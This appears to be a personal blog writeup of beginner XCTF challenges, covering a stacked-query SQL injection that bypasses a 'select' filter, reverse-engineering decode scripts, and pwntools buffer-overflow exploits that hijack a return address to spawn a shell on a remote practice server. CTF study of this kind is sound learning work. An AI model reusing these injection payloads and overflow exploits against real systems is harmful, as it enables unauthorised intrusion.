攻防世界之我是菜鸡

date
Aug 5, 2021 12:17 PM
Related to 日程数据 1 (blog)
tags
Writeup
slug
web2
summary
go on

0x0e supersqli

notion image
notion image
notion image
因为select被过滤了,所以先将select * from 1919810931114514进行16进制编码 再通过构造payload得 ;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;# 进而得到flag prepare…from…是预处理语句,会进行编码转换。 execute用来执行由SQLPrepare创建的SQL语句。 SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。
 
 
 

open-source

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
    if (argc != 4) {
    	printf("what?\n");
    	exit(1);
    }

    unsigned int first = atoi(argv[1]);
    if (first != 0xcafe) {
    	printf("you are wrong, sorry.\n");
    	exit(2);
    }

    unsigned int second = atoi(argv[2]);
    if (second % 5 == 3 || second % 17 != 8) {
    	printf("ha, you won't get it!\n");
    	exit(3);
    }

    if (strcmp("h4cky0u", argv[3])) {
    	printf("so close, dude!\n");
    	exit(4);
    }

    printf("Brr wrrr grr\n");

    unsigned int hash = first * 31337 + (second % 17) * 11 + strlen(argv[3]) - 1615810207;

    printf("Get your key: ");
    printf("%x\n", hash);
    return 0;
}
atoi (表示ascii to integer)
 
./string 51966 25 h4cky0u
 
或者 去判断
#include <stdio.h>
#include <string.h>
 
int main() {
     
    unsigned int hash = 0xcafe * 31337 + 8 * 11 + strlen("h4cky0u") - 1615810207;
     
    printf("Get your key: ");
     
    printf("%x\n", hash);
     
    return 0;
}
notion image
 
 
 

hello ctf

 
notion image
notion image

simple-unpack

 
notion image
notion image
这是有壳啊
notion image
notion image
notion image
notion image
 

logmein

 
 
notion image
notion image
notion image
notion image
适量N
notion image
var28="harambe"
var20=":\"AL_RT^L*.?+6/46"
flag=""

for i in range(len(var20)):
    f = ord(var20[i]) ^ ord(var28[i%7])
    flag +=chr(f)
    print(flag)
notion image
 
 

no-strings-attached

notion image
notion image
X追踪一下
notion image
notion image
要解密
notion image
notion image
buf =[
0x3a,0x14,0x00,0x00,0x36,0x14,0x00,0x00,0x37,0x14,0x00,0x00,0x3b,0x14,0x00,
0x00,0x80,0x14,0x00,0x00,0x7a,0x14,0x00,0x00,0x71,0x14,
0x00,0x00,0x78,0x14,0x00,0x00,0x63,0x14,0x00,0x00,0x66,
0x14,0x00,0x00,0x73,0x14,0x00,0x00,0x67,0x14,0x00,0x00,
0x62,0x14,0x00,0x00,0x65,0x14,0x00,0x00,0x73,0x14,0x00,
0x00,0x60,0x14,0x00,0x00,0x6b,0x14,0x00,0x00,0x71,0x14,
0x00,0x00,0x78,0x14,0x00,0x00,0x6a,0x14,0x00,0x00,0x73,
0x14,0x00,0x00,0x70,0x14,0x00,0x00,0x64,0x14,0x00,0x00,
0x78,0x14,0x00,0x00,0x6e,0x14,0x00,0x00,0x70,0x14,0x00,
0x00,0x70,0x14,0x00,0x00,0x64,0x14,0x00,0x00,0x70,0x14,
0x00,0x00,0x64,0x14,0x00,0x00,0x6e,0x14,0x00,0x00,0x7b,
0x14,0x00,0x00,0x76,0x14,0x00,0x00,0x78,0x14,0x00,0x00,
0x6a,0x14,0x00,0x00,0x73,0x14,0x00,0x00,0x7b,0x14,0x00,
0x00,0x80,0x14,0x00,0x00]
f=[]
for i in range(0,len(buf),4):
    f.append(buf[i])    
print(f)
fl=""
nu=[1,2,3,4,5]
for j in range(len(f)):
    fl += chr(f[j]-nu[j%5])
    print(fl)
 

getit

notion image
notion image
s = 'c61b68366edeb7bdce3c6820314b7498'
flag = ''
for i in range(len(s)):
    if i & 1:
        t = 1
    else:
        t = -1
    flag  += chr(ord(s[i]) + t)
print (flag)
 
#得出结果:  b70c59275fcfa8aebf2d5911223c6589
 

csaw2013reversing2

notion image
notion image
打开是必须勾选以写入模式加载
notion image
notion image
notion image
notion image
 
notion image
 
参考
 
 
 
 

EasyRE

 
看见奇怪的东西
notion image
是个幌子
notion image
 
逆向算法
 
翻车
 
 
 

level0

notion image
没啥东西
notion image
有提示 点进去
notion image
可以输入0x200的东西 but *buf的长度为0x80
 
notion image
from pwn import * 
r = remote("111.200.241.244",58379)   #  服务器
payload = b'A' * 0x80 + b'a' * 0x8 + p64(0x00400596)  #0x80的大小加leave的0x8 改写ret为callsystem的头
r.recvuntil("Hello, World\n")  #等待指定字符  p.recv() #接收输出
r.sendline(payload)   #发送payload
r.interactive() #交互
notion image
 
 

level2

 
notion image
漏洞函数在前
notion image
notion image
0x88 可被0x100覆盖溢出
找想要跳的add system 函数 0x08048320
notion image
需要system('/bin/shell') 找到字符 0x0804a024
notion image
构建pyalod
notion image
 
payload=b'a'*(0x88+0x4)+p32(0x08048320)+p32(0)+p32(0x0804a024)
notion image
from pwn import *
p = remote('111.200.241.244', 60256)
#payload = b'a' * (0x88 + 0x4) + p32(0x0804845c) + p32(0x0804A024) #call system的地址
payload=b'a'*(0x88+0x4)+p32(0x08048320)+p32(0)+p32(0x0804a024)
#p.recvuntil("Input:\n")
p.recv()
p.sendline(payload)
p.interactive()
两种方式都可以
 
 

level3

 
 

© lewoking 2021 - 2022